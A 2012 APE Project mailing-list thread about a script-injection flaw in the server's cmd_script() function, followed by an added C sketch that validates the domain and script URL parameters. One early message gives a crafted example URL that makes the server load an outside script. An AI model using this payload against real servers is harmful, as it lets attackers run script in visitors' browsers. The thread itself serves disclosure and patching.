You would have to patch the file, rebuild the server and replace the generated aped file with the one in your installation.
Before digging into the source, can you verify if the hook I mentioned above fixes this bug?

On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote:
> Indeed, thanks for pointing it out Pablo.
> Now what, should I just edit and patch the file and then reload APE,
> or do I have to reinstall all over?
>
> On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote:
> > He did mention src/cmd.c
> > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote:
> >
> > > Have you released any patch? If you made some workaround, what file
> > > should we patch?
> > >
> > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote:
> > > > I recently dealt with an issue that allows injecting any JS script by
> > > > preparing a link like:
> > > > http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]
> > > >
> > > > It allows either attaching a script from your URL or injecting a script
> > > > directly, such as in this example.
> > > >
> > > > The solution for this issue is to filter both params domain and scripts
> > > > in file src/cmd.c (function: cmd_script()) in the APE server.
> > >
> > > --
> > > You received this message because you are subscribed to the Google
> > > Groups "APE Project" group.
> > > To post to this group, send email to [email protected]
> > > To unsubscribe from this group, send email to
> > > [email protected]
> > > For more options, visit this group at
> > > http://groups.google.com/group/ape-project?hl=en
> > > ---
> > > APE Project (Ajax Push Engine)
> > > Official website : http://www.ape-project.org/
> > > Git Hub : http://github.com/APE-Project/
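
The quoted report suggests filtering the `domain` and `scripts` parameters in `cmd_script()`. One way such a filter could look, as an added example that is not part of this thread or of APE's own code: `is_safe_domain`, `is_safe_script_url` and the `allowed_host` parameter are hypothetical, and the sketch assumes both values are written into the HTML response and that scripts should only load from one configured host.

```c
#include <string.h>

static int ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z');
}

/* Hypothetical helper (added example, not APE code): plain DNS names only. */
int is_safe_domain(const char *s)
{
    size_t len, i;
    if (s == NULL || (len = strlen(s)) == 0 || len > 253)
        return 0;
    if (s[0] == '.' || s[0] == '-' || s[len - 1] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!ascii_alnum(c) && c != '-' && c != '.')
            return 0;                    /* rejects quotes, <, >, ;, spaces */
        if (c == '.' && s[i + 1] == '.')
            return 0;                    /* empty label */
    }
    return 1;
}

/* Hypothetical helper: http(s) URL on allowed_host, free of markup-breaking bytes. */
int is_safe_script_url(const char *url, const char *allowed_host)
{
    const char *p;
    size_t hlen;
    if (url == NULL || allowed_host == NULL)
        return 0;
    if (strncmp(url, "http://", 7) == 0)
        p = url + 7;
    else if (strncmp(url, "https://", 8) == 0)
        p = url + 8;
    else
        return 0;                        /* no javascript:, data:, relative paths */
    hlen = strcspn(p, "/:?#");
    if (hlen != strlen(allowed_host) || memcmp(p, allowed_host, hlen) != 0)
        return 0;                        /* exact, case-sensitive host match */
    for (; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c <= 0x20 || c >= 0x7f || strchr("\"'<>\\`@", c) != NULL)
            return 0;                    /* cannot close src="..." or the tag */
    }
    return 1;
}
```

The checks run on the decoded parameter values, after URL decoding and JSON parsing, so percent-encoded quotes and angle brackets in the request are seen in their literal form.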
